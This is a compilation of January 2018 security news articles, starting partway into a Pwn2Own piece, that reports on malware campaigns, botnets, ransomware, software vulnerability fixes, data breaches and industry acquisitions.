Since Microsoft is a partner of Pwn2Own 2018, it has asked ZDI to introduce a special category for some of its flagship pre-release security technologies in the latest Windows Insider Preview for Business running on Surface Book 2 devices.

Targets include Windows Defender Application Guard for Edge, Windows SMB, and the Windows Hyper-V client. Prizes range between $10,000 and $250,000.

As always, the contestant or team with the highest number of Master of Pwn points will earn 65,000 ZDI reward points, which are worth roughly $25,000. In addition, the first-round winner for each category can win a laptop.

At Pwn2Own 2017, ZDI paid out a total of $833,000 for 51 vulnerabilities, nearly double than the $460,000 earned by hackers in the previous year for only 21 new flaws. Given that this year’s prize pool is $2 million, double than what organizers offered last year, we can expect some interesting exploits.


30 Million Possibly Impacted in Crypto-Currency Mining Operation
25.1.2018 securityweek
Virus

A large-scale crypto-currency mining operation active for over 4 months is believed to have impacted around 30 million systems worldwide, Palo Alto Networks security researchers say.

The campaign, which attempts to mine the Monero cryptocurrency using the open-source XMRig utility, has affected mainly users in South-East Asia, Northern Africa, and South America. The campaign employed VBS files and URL shortening services to install the mining tool and also used XMRig proxy services on the hosts to mask the used wallets.

Telemetry data from the Bit.ly URL shortening service suggested that at least 15 million people were impacted. However, with less than half of the identified samples using Bit.ly, the researchers speculate that the actual number of affected users could be upwards of 30 million.

The campaign employed over 250 unique Microsoft Windows PE files, over half of which were downloaded from online cloud storage provider 4sync. What the researchers couldn’t establish, however, was how the file downloads were initiated.

The attackers attempted to make their files appear to have both generic names and to originate from popular looking file sharing services.

The Adf.ly URL shortening service that pays users when their links are clicked was also used in this campaign. When users clicked on these Adf.ly URLs, they were redirected and ended up downloading the crypto-currency mining malware instead.

The malware used in this campaign was meant to execute the XMRig mining software via VBS files and uses XMRig proxy services to hide the ultimate mining pool destination. It also uses Nicehash, a popular marketplace that allows users to trade hashing processing power (it supports various crypto-currencies and sellers are paid in Bitcoin).

Before October 20, 2017, the attackers behind this campaign were using the Windows built-in BITSAdmin tool to download the XMRig mining tool from a remote location. The final payload was mainly installed with the filename ‘msvc.exe’.

After October 20, 2017, the attackers started experimenting with HTTP redirection services, but continued using SFX files to download and deploy their malware. They also started supplementing mining queries with a username and making obfuscation attempts within the VBS files to avoid detection.

Starting on November 16, 2017, the attackers dropped the SFX files and adopted executables compiled in Microsoft .NET Framework. These would write a VBS file to disk and modify Run registry keys to achieve persistence.

In late December, the dropper was compiled with Borland Delphi and would place the VBS file in the victim’s startup folder to achieve persistence. The latest samples using this dropper also switched to a new IP address for XMRig communication, namely 5.23.48[.]207.

The campaign, researchers say, affected most countries around the world. Based on Bit.ly telemetry data, the attacks appear to have hit Thailand (3,545,437 victims), Vietnam (1,830,065), Egypt (1,132,863), Indonesia (988,163), Turkey (665,058), Peru (646,985), Algeria (614,870), Brazil (550,053), Philippines (406,294), and Venezuela (400,661) the most.

“Monero mining campaigns are certainly not a new development, as there have been various reported instances recently. However, it is less common to observe such a large-scale campaign go relatively unnoticed for such a long period of time. By targeting random end-users via malicious advertisements, using seemingly innocuous names for the malware files, and using both built-in Windows utilities and scripting files, the attackers are able to gain a foothold on victim systems at large scale,” Palo Alto concludes.


Malware in 2017 Was Full of Twists and Turns
25.1.2018 securityweek
Virus

Cybercrime in 2017 was a tumultuous year "full of twists and turns", with new (but old) infection methods, a major return to social engineering, and ups and downs in ransomware.

These conclusions come from the 'Cybercrime tactics and techniques: 2017 state of malware' report (PDF) published today by Malwarebytes.

"We look at our own detection telemetry and what we find in our honeypots to see what the criminals are pushing out," Malwarebytes director of malware intelligence, Adam Kujawa, told SecurityWeek, "and we see what trends are apparent." The report covers the period of January to November 2017 and compares it to the same period for 2016.

In some cases, those trends are surprising. Ransomware figured heavily in 2017; but with nuances. Over the year, detections for consumers increased by 93% over 2016, and by 90% for businesses. But those figures disguise a decline in consumer ransomware and an increase in business ransomware over the last few months of 2017.

It's not clear why this happened, but Kujawa conjectures that improving awareness of ransomware and better defenses is making it harder for the criminals to get a good return from consumers. At the same time, while succeeding against business is even more difficult than infecting consumers, the potential return is much higher per victim. Earlier this month, Hancock Health paid $55,000 to recover from a SamSam ransomware attack.

At the same time as ransomware declined at the end of the year, "We saw," said Kujawa, "a significant increase in spyware, banking trojans, hijackers and even adware." He also pointed to a one-month dramatic spike in ransomware detections in September coinciding with an equally dramatic dip in spyware detections. "It indicates that the same type of campaign was being used to distribute both spyware and ransomware," he suggested.

For consumers, adware is now the most-detected threat -- representing around 40% of all consumer detections (it's the second most-detected threat for businesses). Anti-malware firms have been increasingly active against all forms of unwanted apps; and Malwarebytes has been in the vanguard of this. In November it won a court case brought by Enigma Software, supplier of SpyHunter, which Malwarebytes it detects and blocks as unwanted software.

Concurrent with the adware market becoming more difficult, there has been a reduction in the number of players. But, commented Kujawa, "despite there being less players in the game, the attacks themselves are more sophisticated -- we see adware, something we regularly classify as a PUP, using root kit functionality to block security software from running, or just blocking the ability to remove it at all."

The report specifies Smart Service, which is bundled with adware and PUPs to prevent their removal. It hooks into the Windows CreateProcess function, so it can inspect new processes before they run. It also "protects certain processes from being terminated, and stops the user from removing critical files and registry keys."

Apart from adware, the decline in ransomware for business was replaced by an upsurge in spyware and banking trojans. For all malware, the primary tactics of infection changed from 2016 to 2017. "In 2016 we saw lots and lots of exploit kits (also in 2015)," said Kujawa. "Now suddenly spreading malware through email is popular again. It's based on tricking the user into opening something. There's less attacking the computer (exploit kits delivering malware without the user being aware) and more attacking the person (social engineering emails)."

For the consumer, the big growth malware in 2017 has been crypto-miners. Exploit kits, drive-by attacks, phishing and malicious spam attacks have all pushed miners. "We blocked one of the primary pushers of this technology, CoinHive," explained Kujawa, "and that turned out to be our #1 detection over many months. We're talking about multi-million detections per day -- averaging about 8 million per day, but I've seen it go up to 12 million and even 20 million on occasion."

One area that did not show an expected increase during 2017 was botnet activity. "The last year showed a steady decline in detections for botnet malware, a huge shift from what we saw in 2016," notes the report. "This aligns for both business and consumer customer telemetry."

There's likely little comfort in this. "Declines," adds the author, "are likely due to a shift in focus away from the desktop, aiming at IoT devices such as routers or smart appliances instead." We learned the potential for large IoT-based botnets at the end of 2016, with the Mirai attacks. "While there was a lack of massive IoT attacks in 2017, attackers have been spending their time focused on developing new tools to take advantage of IoT with cryptocurrency mining, spam-spreading botnets, and likely more DDoS attacks."

Ransomware is currently showing a downward trend. Crypto-mining may not survive the volatility in market prices (Bitcoin is currently trading at around $11,000; down from nearly $20,000 just a few weeks ago) and the likelihood of greater international cryptocurrency regulation. But Malwarebytes warns they could be replaced by something new and potentially more worrying.

"It is not farfetched," says the report, "to think we may see DDoS attacks against large organizations, like airline companies and power utilities, demanding a ransom payment to call off an army of botnet-infected IoT devices." Ransomware might decline, merely to be replaced by larger DDoS ransoms.


"Hide 'N Seek" IoT Botnet Ensnares 20,000 Devices in Days
25.1.2018 securityweek IoT  BotNet

An Internet of Things (IoT) botnet featuring a worm-like spreading mechanism managed to ensnare over 20,000 devices over the course of several days, Bitdefender reports.

Dubbed Hide ‘N Seek, the botnet was first spotted on January 10, when it focused on IP cameras manufactured by a Korean company, but vanished just days after. On January 20, however, the researchers observed a new, improved variant of the malware, which has ensnared more than 20,000 devices worldwide and continues to spread quickly.

The malware was designed to exfiltrate data, execute code, and interfere with the device operation. Employing a complex and decentralized communication technique and multiple anti-tampering methods to prevent hijacking, the botnet uses the same exploit as Reaper (CVE-2016-10401 and other vulnerabilities), Bitdefender says.

The bot’s worm-like spreading mechanism consists of randomly generating a list of IP addresses to target, and then initiating a raw socket SYN connection to each host on specific destination ports (23, 2323, 80, and 8080). After establishing a connection, the bot first looks for a specific banner (“buildroot login:”) and attempts log in via predefined credentials, or launches a dictionary attack if that fails.

Next, the malware attempts to properly identify the target device and select a compromise method, such as setting up a TFTP server if the target is on the same LAN, or a remote payload delivery method if the target is on the Internet.

These pre-configured exploitation techniques are located in a digitally signed memory location to prevent tampering and can be updated remotely and propagated among infected hosts. Targeting IoT devices, the botnet can’t achieve persistence, meaning that a device reboot would clear up the infection.

After Hajime, Hide ‘N Seek becomes the second known IoT botnet to use a decentralized, peer-to-peer architecture. The difference is that, while Hajime used p2p functionality based on the BitTorrent protocol, the new botnet uses a custom-built p2p communication mechanism.

“The bot opens a random port on the victim, and adds firewall rules to allow inbound traffic for the port. It then listens for connections on the open port and only accepts the specific commands described below,” Bitdefender Senior Threat Analyst Bogdan Botezatu explains.

To prevent infiltration or poisoning attempts, the malware uses an elliptic curve key within the file used to authenticate the command for updating the memory zone where configuration settings are stored.

The bot includes support for multiple commands for configuration updates, a data exfiltration mechanism, and a scanning component (which sends to a peer valid credentials found via dictionary attack). It also supports commands to add a new peer to the list and send a peer IP as a response.

“While IoT botnets have been around for years, mainly used for DDoS attacks, the discoveries made during the investigation of the Hide and Seek bot reveal greater levels of complexity and novel capabilities such as information theft – potentially suitable for espionage or extortion. It is also worth noting that the botnet is undergoing constant redesign and rapid expansion,” Botezatu concludes.

A recent NETSCOUT Arbor report on distributed denial of service attacks has revealed that compromised IoT devices can fuel new, complex assaults. The emergence of new IoT botnets such as Masuta or Satori has proved once again the need for improved security for Internet-connected devices.

“As IoT devices become increasing popularity in our modern lives, they also become more attractive to cybercriminals. In fact, in 2017 we recorded a record number of IoT vulnerabilities, with them more than doubling since 2016,” Nadav Avital, security research team leader at Imperva, told SecurityWeek in an emailed statement.

“This [Bitdefender] research also emphasizes the need for an account takeover solution which protects all devices with a network presence. Account takeover is a big problem, however it is not something which IoT vendors provide protection for. It is therefore a good idea for organizations to deploy an external solution for security,” Avital concluded.


A look into the cyber arsenal used by Lazarus APT hackers in recent attacks against financial institutions
25.1.2018 securityaffairs APT

Security experts at Trend Micro have analyzed malware and a tool used by the Lazarus APT group in the recent attacks against financial institutions.
Security experts at Trend Micro have analyzed the attacks conducted by the notorious Lazarus APT group against financial institutions.

The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems. Security researchers discovered that North Korean Lazarus APT group was behind attacks on banks, including the Bangladesh cyber heist.

In the last campaigns against financial firms, the cyber spies launched watering hole attacks and leveraged a variant of the Lazarus-linked RATANKBA Trojan.

“The malware known as RATANKBA is just one of the weapons in Lazarus’ arsenal. This malicious software, which could have been active since late 2016, was used in a recent campaign targeting financial institutions using watering hole attacks. The variant used during these attacks (TROJ_RATANKBA.A) delivered multiple payloads that include hacking tools and software targeting banking systems.” reads the analysis published by Trend Micro.

“We analyzed a new RATANKBA variant (BKDR_RATANKBA.ZAEL–A), discovered in June 2017, that uses a PowerShell script instead of its more traditional PE executable form—a version that other researchers also recently identified.“

The researchers identified and hacked in some servers used by the cyber spies for temporarily storing stolen data, the analysis of the backend revealed that around 55% of the victims were located in India and neighboring countries.

The majority of the victims were not using enterprise versions of Microsoft software, less than 5% of the victims were Microsoft Windows Enterprise users.

The IP addresses of the victims don’t belong to a large bank or a financial institution, according to Trend Micro victims are likely employees of three web software development companies in India and one in South Korea.

The RATANKBA Trojan is delivered via weaponized Office documents (containing topics related to cryptocurrencies and software development), CHM files, and script downloaders.

Experts noticed that attackers don’t implement a real-time communication with the malware. Once compromised a target machine, the attackers will use a Remote Controller tool to send jobs to the system, the queue of jobs is then processed by RATANKBA.

“During our analysis, we collected a copy of the RATANKBA malware’s Lazarus Remote Controller tool. The remote controller provides a user interface that allows attackers to send jobs to any compromised endpoint. The controller gives the attackers the ability to manipulate the victims’ host by queueing tasks on the main server. RATANKBA retrieves and executes the tasks, and retrieves the collected information.” continues the analysis.

The controller tools used by the Lazarus APT implements a graphical UI interface that allows hackers to push code to the server and download victim profiles from it.

Lazarus%20APT%20group%202

Trend Micro also provided a profile of the members of the Lazarus APT group, the hackers appear to be native Korean speakers and at least one of them is believed to also understand Chinese.

“Given Lazarus’ use of a wide array of tools and techniques in their operations, it’s reasonable to assume that the group will continue to use ever-evolving tactics in their malicious activities.” concluded Trend Micro.


Critical code execution flaw in Electron framework impacts popular Desktop apps such as Skype and Signal
25.1.2018 securityaffairs
Vulnerebility

A critical RCE vulnerability in the Electron framework impacts popular desktop applications, including Skype, Signal, Slack, GitHub Desktop, Twitch, and WordPress.com.
A remote code execution vulnerability tracked as CVE-2018-1000006 was fixed in the Electron framework, which is used by popular desktop applications, including Skype, Signal, Slack, GitHub Desktop, Twitch, and WordPress.com.

Electron is a node.js, V8, and Chromium open-source framework that allows developers to use web technologies such as JavaScript, HTML, and CSS to build desktop apps.

The framework is currently being developed by GitHub, the Electron dev team released the versions v1.8.2-beta.4, electron v1.7.11, and electron v1.6.16 to address the issue.

“A remote code execution vulnerability has been discovered affecting Electron apps that use custom protocol handlers. This vulnerability has been assigned the CVE identifier CVE-2018-1000006.” states the Electron team in a post.

“Electron apps designed to run on Windows that register themselves as the default handler for a protocol, like myapp://, are vulnerable.

Such apps can be affected regardless of how the protocol is registered, e.g. using native code, the Windows registry, or Electron’s app.setAsDefaultProtocolClient API.”

Electron%20framework

,Currently, more than 460 cross-platform desktop applications leverage the Electron framework, but the code execution flaw affects only that use custom protocol handlers, macOS and Linux are not vulnerable to the issue.

All three releases are available for download on GitHub.

The experts also provided a workaround to avoid the exploitation of the vulnerability.

“If for some reason you are unable to upgrade your Electron version, you can append “–“ as the last argument when calling app.setAsDefaultProtocolClient, which prevents Chromium from parsing further options. The double dash “–“ signifies the end of command options, after which only positional parameters are accepted,” Electron explains.

Electron developers are advised to update their application immediately.

“We’ve published new versions of Electron which include fixes for this vulnerability:
1.8.2-beta.4
,
1.7.11
, and
1.6.16
. We urge all Electron developers to update their apps to the latest stable version immediately.” Electron team added.


New HNS botnet has already compromised more than 20,000 IoT devices
25.1.2018 securityaffairs BotNet  IoT

A new botnet called Hide ‘N Seek (HNS botnet) appeared in the threat landscape, the malware is rapidly spreading infecting unsecured IoT devices, mainly IP cameras.
The HNS botnet was first spotted on January 10th by malware researchers from Bitdefender, then it disappeared for a few days, and it has risen over the weekend.

The number of infected systems grew up from 12 at the time of the discovery up to over 20,000 bots, at the time of writing.

HNS%20botnet

“Bitdefender researchers have uncovered an emerging botnet that uses advanced communication techniques to exploit victims and build its infrastructure. The bot, dubbed HNS, was intercepted by our IoT honeypot system following a credentials dictionary attack on the Telnet service.” states the analysis from Bitdefender.

“The samples identified in our honeypots on Jan. 10 revolved around IP cameras manufactured by a Korean company. These devices seemed to play a major role in the botnet as, out of the 12 IP addresses hardcoded in the sample, 10 used to belong to Focus H&S devices. The new version, observed on Jan. 20, dropped the hardcoded IPs.”

Recently security experts spotted other IoT botnets, most of them linked to the Mirai botnet, such as Satori, Okiru, and Masuta, but the HNS botnet has a different genesis and doesn’t share the source code.

Researchers at Bitdefender found similarities between the HNS and the Hajime botnets, unlike Mirai, Hajime doesn’t use C&C servers, instead, it implements a peer-to-peer network.

Hajime is more sophisticated than Mirai, it implements more mechanisms to hide its activity and running processes and its modular structure allows operators to add new capabilities on the fly.

“It is the second known IoT botnet to date, after the notorious Hajime botnet, that has a decentralized, peer-to-peer architecture,” states Bitdefender. “However, if in the case of Hajime, the P2P functionality was based on the BitTorrent protocol, here we have a custom-built P2P communication mechanism.”

The HNS malware is able to infect a series of IoT devices using the exploit as Reaper, the current version is able to receive and execute several types of commands, such as data exfiltration, code execution and interference with a device’s operation.
HNS%20botnet

According to the experts, the botnet is still under development, it doesn’t include DDoS capabilities, a circumstance that suggests it is intended to be deployed as a proxy network.

“While IoT botnets have been around for years, mainly used for DDoS attacks, the discoveries made during the investigation of the Hide and Seek bot reveal greater levels of complexity and novel capabilities such as information theft – potentially suitable for espionage or extortion.” concluded Bitdefender.

“It is also worth noting that the botnet is undergoing constant redesign and rapid expansion.”

The bot spread by randomly generates a list of IP addresses that could be potentially compromised. It then initiates a raw socket SYN connection to each potential target and continues communication with those devices that answer the request on specific destination ports (23 2323, 80, 8080).

Once the bot has established a connection it will look for a specific banner (“buildroot login:”) presented by the victim. If it gets this login banner, it attempts to log in using a list of default credentials. If the credentials are not correct, the botnet launches a dictionary attack using a hardcoded list.

Once connected to the victim, the malware will run through a “state machine” to determine the type of target device and select the most suitable compromise method. Experts explained that if the device shares the same network with the bot, the bot sets up TFTP server to allow the victim to download the malicious code from the bot. If the victim is located on the internet, the bot will attempt to use a specific remote payload delivery method to get the target device to download and execute the sample.

“These exploitation techniques are preconfigured and are located in a memory location that is digitally signed to prevent tampering. This list can be updated remotely and propagated among infected hosts.” continues the analysis.

Experts observed that the HNS botnet cannot establish persistence on infected devices, once the device restart, the malware will be removed, this means that botnet operators have to continuously manage the HNS botnet.

Let’s monitor the growth of the new-born botnet.


libcurl has had authentication leak bug dated back to before September 1999
25.1.2018 securityaffairs
Vulnerebility

According to a security advisory, libcurl is affected by a couple of issues, one of them might cause the leakage of authentication data to third parties.
libcurl is a free and easy-to-use client-side URL transfer library, it builds and works identically on numerous platforms.

According to a security advisory, libcurl is affected by a couple of issues, one of them might cause the leakage of authentication data to third parties.

The problem is related to the way it handles custom headers in HTTP requests.

“When asked to send custom headers in its HTTP requests, libcurl will send that set of headers first to the host in the initial URL but also, if asked to follow redirects and a 30X HTTP response code is returned, to the host mentioned in URL in the `Location:` response header value.” states the advisory.

“Sending the same set of headers to subsequest hosts is in particular a problem for applications that pass on custom `Authorization:` headers, as this header often contains privacy sensitive information or data that could allow others to impersonate the libcurl-using client’s request. We are not aware of any exploit of this flaw.”

Applications that pass on custom authorization headers could leak credentials or information that could be abused by attackers to impersonate the libcurl-using client’s request.

This vulnerability tracked as CVE-2018-1000007 has been present since before curl 6.0, back to before September 1999. Affected versions are libcurl 7.1 to and including 7.57.0, later versions (7.58.0) are not affected, the patch was published on GitHub.

“In libcurl version 7.58.0, custom `Authorization:` headers will be limited the same way other such headers is controlled within libcurl: they will only be sent to the host used in the original URL unless libcurl is told that it is ok to pass on to others using the `CURLOPT_UNRESTRICTED_AUTH` option.” states the advisory.

“this solution creates a slight change in behavior. Users who actually want to pass on the header to other hosts now need to give curl that specific permission. You do this with [–location-trusted](https://curl.haxx.se/docs/manpage.html#–location-trusted) with the curl command line tool.”

libcurl is also affected by an “HTTP/2 trailer out-of-bounds read” vulnerability tracked as CVE-2018-1000005.

The issue is related to the code that creates HTTP/1-like headers from the HTTP/2 trailer data that appends a string like `”:”` to the target buffer (it was recently changed to `”: “` (a space was added after the colon) but the associated math wasn’t updated correspondingly.

“When accessed, the data is read out of bounds and causes either a crash or that the (too large) data gets passed to the libcurl callback. This might lead to a denial-of-service situation or an information disclosure if someone has a service that echoes back or uses the trailers for something.” reads the advisory.

The second issue, CVE-2018-1000005, is described as an “HTTP/2 trailer out-of-bounds read”. The advisory says “reading an HTTP/2 trailer could mess up future trailers since the stored size was one byte less than required.”

“When accessed, the data is read out of bounds and causes either a crash or that the (too large) data gets passed to the libcurl callback. This might lead to a denial-of-service situation or an information disclosure if someone has a service that echoes back or uses the trailers for something.”

Affected versions are libcurl 7.49.0 to and including 7.57.0, experts are not aware of any exploit of this vulnerability in the wild.


Spritecoin ransomware masquerades as cryptocurrency wallet and also harvests victim’s data
25.1.2018 securityaffairs
Ransomware

Fortinet discovered a strain of ransomware dubbed Spritecoin ransomware that only allows victims Monero payments and pretends to be a cryptocurrency-related password store.
Researchers from Fortinet FortiGuard Labs has discovered a strain of ransomware that only allows victims Monero payments and pretends to be a cryptocurrency-related password store.

The ransomware poses itself as a “spritecoin” wallet, it asks users to create their desired password, but instead of downloading the block-chain it encrypts the victim’s data files.

The malware asks for a 0.3 Monero ransom ($105 USD at the time of writing) and drops on the target system a ransom note of “Your files are encrypted.”

SpriteCoin%20ransomware

The malware includes an embedded SQLite engine, a circumstance that leads experts to believe it also implements a credentials harvesting feature for Chrome and Firefox credential store. The malicious code appends the .encrypted file extension to encrypted files (i.e. resume.doc.encrypted).

While decrypting the files, the Spritecoin ransomware also deploys another piece of malware that is able to harvest certificates, parse images, and control the web camera.

“In a cruel twist, if the victim decides to pay and obtain a decryption key they are then delivered a new malicious executable [80685e4eb850f8c5387d1682b618927105673fe3a2692b5c1ca9c66fb62b386b], detected as W32/Generic!tr.” reads the report.

“While have not yet fully analyzed this malicious payload, we can verify that it does have the capability to activate web cameras and parse certificates and keys that will likely leave the victim more compromised than before.”

The experts speculate the ransomware is being spread via forum spam that targets users interested in cryptocurrency.

“Ransomware is usually delivered via social engineering techniques, but can also be delivered without user interaction via exploits. These often arrive (but are not limited to) via email, exploit kits, malicious crafted Excel/Word/PDF macros, or JavaScript downloaders.” states the analysis published by Fortinet.

“The attacker often uses social engineering and carefully crafted malicious emails to trick and entice the victim to run these executables. These files are often seen using compelling file names to lure the victim into opening the file. Usually, the ransomware requires some user interaction to successfully compromise the victim’s machine.”

In this case, the threat arrives as a “SpriteCoin” package (spritecoind[.]exe) under the guise of a SpriteCoin crypto-currency wallet.”

Once installed on the victim’s machine, the malware will present a user with a prompt to “Enter your desired wallet password.”

SpriteCoin%20ransomware

When the victims provide their credentials the Spritecoin ransomware inform users it is downloading the blockchain, while it is actually encrypting the files.

The ransomware connects to a TOR site via an Onion proxy (http://jmqapf3nflatei35[.]onion.link/*) that allows the victim to communicate with the attacker’s website without the need for a TOR connection.

Further details, including IoCs are included in the report.


Facebook Acquires ID Verification Startup Confirm
24.1.2018 securityweek
Social

Facebook has acquired Confirm, a Boston-based startup that specializes in identity verification solutions. Financial terms of the deal have not been disclosed.

Confirm has developed APIs and SDKs that can be integrated into applications that require easy and secure authentication of driver’s licenses and other government IDs. The company’s product leverages advanced pattern analysis and forensic checks to determine if an ID is legitimate.

Before being acquired by Facebook, the company’s website said its products had been used by more than 750 organizations around the world to authenticate customer identity documents.

“When we launched Confirm, our mission was to become the market's trusted identity origination platform for which other multifactor verification services can build upon,” reads a message posted on the Confirm.io website following the acquisition. “Now, we're ready to take the next step on our journey with Facebook.”

Confirm has informed customers that it will wind down its existing ID authentication products. The company’s employees will join Facebook in Boston.

“We are excited to welcome the Confirm team to Facebook,” a Facebook spokesperson told SecurityWeek. “Their technology and expertise will support our ongoing efforts to keep our community safe.”

Facebook asks users to send a scan or photo of their ID to show account ownership or confirm their name. It is possible that the technology obtained as a result of the Confirm acquisition will be used to improve this system.

Confirm was founded by Walter Doyle, whose consumer mobile company WHERE.com was acquired by PayPal in 2011; mobile entrepreneur and venture capitalist Bob Geiman; and Ralph Rodriguez, founder of Delfigo Security, a multifactor authentication company acquired by IBM.

In January 2016, the company announced that it had raised $4 million in a seed funding round.


Bell Canada Hit by Data Breach
24.1.2018 securityweek Incindent

Bell Canada has started informing customers that their personal data has been compromised in a breach that reportedly affects up to 100,000 individuals.

Bell told customers that their names and email addresses were aaccessed by hackers, but the company said in an emailed statement that the attackers also obtained phone numbers, usernames and/or account numbers for a limited number of people. The telecoms company, however, says there is no evidence that credit card or banking information has been compromised.

In response to the incident, Bell has implemented additional authentication and identification requirements for accessing accounts. The company has also advised users to frequently change their password and security questions, and regularly review their financial and online accounts for unauthorized activity.

“The protection of consumer and corporate information is of primary importance to Bell,” John Watson, Executive Vice-President of Customer Experience at Bell Canada, told customers. “We work closely with the RCMP and other law enforcement agencies, government bodies and the broader technology industry to combat the growth of cyber crimes.”

Lisa Baergen, marketing director with Vancouver-based NuData Security, a Mastercard company, pointed out that even limited information such as names and email addresses can be useful to malicious actors.

“We all know bad actors are very talented at preparing fraud schemes with that information, such as phishing scams or dictionary attacks – where fraudsters try certain common passwords based on the user’s personal information,” Baergen said.

“Bell is doing the right thing by evaluating the extent of the damage and keeping customers updated,” she added. “However, to avoid damage after a breach, companies that share clients with Bell can consider applying multi-layered security solutions based on passive biometrics to protect their business and their customers from account takeover of another type of fraud. Online security technologies that evaluate a user or a transaction based on their behavior and not only on their – potentially stolen – static information, thwart all fraudulent attempts that inevitably come after a data breach.”

This is the second time Bell Canada has informed customers of a data breach. In May last year, the company admitted that approximately 1.9 million active email addresses and roughly 1,700 names and active phone numbers were accessed by a hacker.

Bell told SecurityWeek that the latest incident is unrelated to the cyberattack disclosed in May.


Apple Patches Meltdown Flaw in Older Versions of macOS
24.1.2018 securityweek Apple

Apple on Tuesday released security updates for a majority of its products, and it patched the vulnerability that allows Meltdown attacks in earlier versions of its Mac operating system.

Apple rolled out the first mitigations for the Meltdown attack before the flaws were disclosed, in early December, with the release of iOS 11.2, macOS 10.13.2 and tvOS 11.2. Protections against Spectre attacks were added on January 8 with the release of iOS 11.2.2, macOS High Sierra 10.13.2 Supplemental Update, and Safari 11.0.2.

The latest security updates released by the tech giant for Mac computers patch 17 vulnerabilities, including a kernel flaw that allows Meltdown attacks (CVE-2017-5754) in macOS Sierra 10.12.6 and OS X El Capitan 10.11.6.

The update for High Sierra also addresses several other kernel vulnerabilities that can be exploited to read restricted memory and execute arbitrary code with elevated privileges, including ones found by Jann Horn, the Google researcher who independently discovered the Meltdown and Spectre weaknesses.

Other macOS vulnerabilities patched on Monday affect the audio, cURL, LinkPresentation, QuartzCore, sandbox, security, WebKit and Wi-Fi components.

The updates for macOS High Sierra 10.13.2, macOS Sierra 10.12.6, and OS X El Capitan 10.11.6 also fix the IOHIDFamily local privilege escalation vulnerability disclosed by a researcher on New Year’s Eve. The expert disclosed the flaw without giving Apple the chance to release a patch, arguing that it’s not remotely exploitable and the PoC he made public is not stealthy.

iOS 11.2.5 patches 13 security holes, including in the audio, Bluetooth, kernel, LinkPresentation, QuartzCore, security, and WebKit components. Some of these flaws are the same ones that affect macOS.

Since watchOS and tvOS are also based on iOS, a majority of the vulnerabilities have also been patched in the Apple Watch and Apple TV operating systems.

The WebKit flaws have also been resolved by Apple in iCloud for Windows, iTunes for Windows, and Safari.

Despite being among the first vendors to start releasing patches, Apple is facing class action lawsuits over the Meltdown and Spectre CPU vulnerabilities. Apple’s processors are affected due to the fact that they use ARM technology.


Amazon Acquires Threat Hunting Firm Sqrrl
24.1.2018 securityweek Security

Sqrrl, a Cambridge, Mass.-based big data analytics startup that is commercializing NSA technology to help organizations detect threats lurking in their infrastructure, has been acquired by Amazon.

The company announced Tuesday that it has been acquired by Amazon and would be joining the Amazon Web Services (AWS) family.

Sqrrl Logo

Founded in 2012, Sqrrl has raised more than $28 million in funding, including $12.3 million in June 2017 and $7 million in February 2015.

At the core of Sqrrl Enterprise is Accumulo, a database project that began at the NSA in 2008 when the spy agency was searching for a platform that could meet its growing data challenges. In 2011, NSA open sourced Accumulo, which has since become a project at the Apache Foundation. Accumulo was inspired by Google's BigTable design and is built on top of Apache Hadoop, Zookeeper, and Thrift.

In the summer of 2012, a group of the core creators, committers, and contributors to the Accumulo project co-founded Sqrrl.

Built on top of Accumulo, Sqrrl’s software analyzes masses of data in order to uncover hidden patterns, trends, and links, and enables security analysts to visually navigate the relationships between assets and actors involved in a given event. As a result, security teams can detect and mitigate data breaches resulting from cyber-espionage, insider threats, and other types of hard-to-detect attacks.

Six of the seven original members of the Sqrrl had worked for the NSA.

The company did not provide details on how its technology would be integrated into AWS offerings, but it could be used to enhance Macie, a recently-launched security service that helps AWS users discover, classify and protect sensitive data. Amazon Macie uses machine learning to automatically identify and protect personally identifiable information (PII), intellectual property and other sensitive data, and informs users of how their data is being accessed or moved via dashboards and alerts.

“For now, it is business as usual at Sqrrl,” noted Mark Terenzoni, Sqrrl CEO. “We will continue to work with customers to provide advanced threat hunting capabilities. And, over time, we’ll work with AWS to do even more on your behalf.”

Terms of the acquisition were not disclosed, though Axios reported in December that talks were under way for Amazon to buy Sqrrl for "a bit north" of $40 million.

Sqrrl's financial backers include Spring Lake Equity Partners, Matrix Partners, Rally Ventures, Accomplice, and Atlas Venture.


Clothing Retailer Fallas Hit by Payment Card Breach
24.1.2018 securityweek Security

Clothing retailer National Stores, which operates 340 stores across the United States, informed customers this week that their payment card information may have been stolen by hackers.

Los Angeles, California-based National Stores, Inc. operates Fallas, Fallas Paredes, Fallas Discount Stores, Factory 2-U, Anna's Linens, and Falas stores in 22 U.S. states and Puerto Rico.

On December 22, the company learned from a third-party that its payment systems may have been breached by malicious hackers. An investigation launched by National Stores revealed that its point-of-sale (PoS) systems had been infected with malware.

According to the company, the malware may have stolen credit card information between July 16 and December 11, 2017. The compromised data includes names, payment card numbers, expiration dates, and security codes.

The list of potentially impacted stores includes more than 270 locations in California, New York, Nevada, Texas, Arizona, New Mexico, Illinois, Florida, Oklahoma, New Jersey, Massachusetts, Virginia, North Carolina, South Carolina, Maryland, Wisconsin, Michigan, Ohio, Georgia, and Puerto Rico. Over 90 of the affected stores are in California, followed by Texas, with 45 locations.

“We have been working closely with the FBI, cybersecurity experts, and payment card brands to contain the incident and protect our customers' payment cards,” said Michael Fallas, CEO of National Stores. “The malware has been removed from our system, and no customers will be responsible for any fraudulent charges to their accounts. We are in the process of strengthening the security of our point of sale systems to prevent this from happening in the future.”

The retailer has advised customers to keep a close eye on account statements and credit reports, and immediately notify their bank of any suspicious activity.

Fallas is not the only clothing retailer to suffer a payment card breach in recent years. The list also includes Brooks Brothers, Buckle, Forever 21 and Eddie Bauer.


World Economic Forum Announces Global Centre for Cybersecurity
24.1.2018 securityweek Cyber

The World Economic Forum (WEF) is establishing a new Global Centre for Cybersecurity "to help build a safe and secure global cyberspace."

This was announced at the 48th Annual Meeting currently taking place in Davos-Klosters, Switzerland. This year's WEF theme is Creating a Shared Future in a Fractured World. WEF's annual Global Risk Report for 2018 shows cyberattacks are now considered the third most serious global threat behind only extreme weather and natural disasters. Data fraud/theft is fourth.

World Economic Forum 2014
Aerial photo from the futuristic and stylish Intercontinental Hotel in Davos, Switzerland. The Annual Meeting of the World Economic Forum takes place in Davos-Klosters, Switzerland from January 23 to 26, 2018. (Image Credit: World Economic Forum)
